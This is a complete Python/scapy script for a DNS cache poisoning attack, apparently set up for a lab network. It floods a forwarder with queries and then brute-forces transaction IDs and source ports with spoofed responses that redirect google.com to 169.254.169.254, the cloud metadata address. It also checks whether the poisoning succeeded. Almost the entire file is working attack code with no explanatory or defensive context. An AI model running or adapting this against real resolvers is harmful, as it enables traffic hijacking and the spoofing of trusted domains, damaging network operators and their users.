#!/usr/bin/python

import itertools
from scapy.all import *


def patch(dns_frame: bytearray, pseudo_hdr: bytes, dns_id: int, dport: int):
    # set dport
    dns_frame[36] = (dport >> 8) & 0xFF
    dns_frame[37] = dport & 0xFF

    # set dns_id
    dns_frame[42] = (dns_id >> 8) & 0xFF
    dns_frame[43] = dns_id & 0xFF

    # reset checksum
    dns_frame[40] = 0x00
    dns_frame[41] = 0x00

    # calc new checksum
    ck = checksum(pseudo_hdr + dns_frame[34:])
    if ck == 0:
        ck = 0xFFFF
    cs = struct.pack("!H", ck)
    dns_frame[40] = cs[0]
    dns_frame[41] = cs[1]


ftabsiz = 150
qname = "example.com"
target = "google.com"
poison = "169.254.169.254"

attacker = "10.10.0.3"
forwarder = "10.10.0.2"
cache = "10.10.0.4"

txids = range(1, 2**16)
sports = range(1025, 2**16)
candidates = itertools.product(txids, sports)

# DNS query
qd = DNSQR(qname=qname, qtype="A", qclass='IN')
req = IP(dst=forwarder) / UDP(dport=53) / DNS(id=0, rd=1, qd=qd)
dns_layer = req[DNS]

# Socket
s2 = conf.L2socket(iface="eth0")
s3 = conf.L3socket(iface="eth0")

print("Querying non-cached names...")
for i in range(ftabsiz):
    dns_layer.id = i
    s3.send(req)

print("Generating spoofed packets...")
res = Ether() / \
      IP(src=cache, dst=forwarder) / \
      UDP(sport=53, dport=0) / \
      DNS(id=0, qr=1, ra=1, qd=qd,
          an=DNSRR(rrname=qname, ttl=900, rdata=target, type="CNAME", rclass="IN") /
             DNSRR(rrname=target, ttl=900, rdata=poison, type="A", rclass="IN"))

# Optimization
dns_frame = bytearray(raw(res))
pseudo_hdr = struct.pack(
    "!4s4sHH",
    inet_pton(socket.AF_INET, res["IP"].src),
    inet_pton(socket.AF_INET, res["IP"].dst),
    socket.IPPROTO_UDP,
    len(dns_frame[34:]),
)

verify = IP(dst=forwarder) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=target, qtype="A", qclass='IN'))

start_time = time.time()

n_pkts = 0
for txid, sport in candidates:
    # Update TXID and UDP dst port
    patch(dns_frame, pseudo_hdr, txid, sport)
    s2.send(dns_frame)

    n_pkts += 1
    if sport == 65535:
        res = sr1(verify, verbose=0, iface="eth0", timeout=0.01)
        if res is not None and res.haslayer(DNSRR):
            print(f"Poisoned: {res[DNSRR].rrname} => {res[DNSRR].rdata}")
            break

end_time = time.time()
print(f"sent {n_pkts} responses in {end_time - start_time:.3f} seconds")
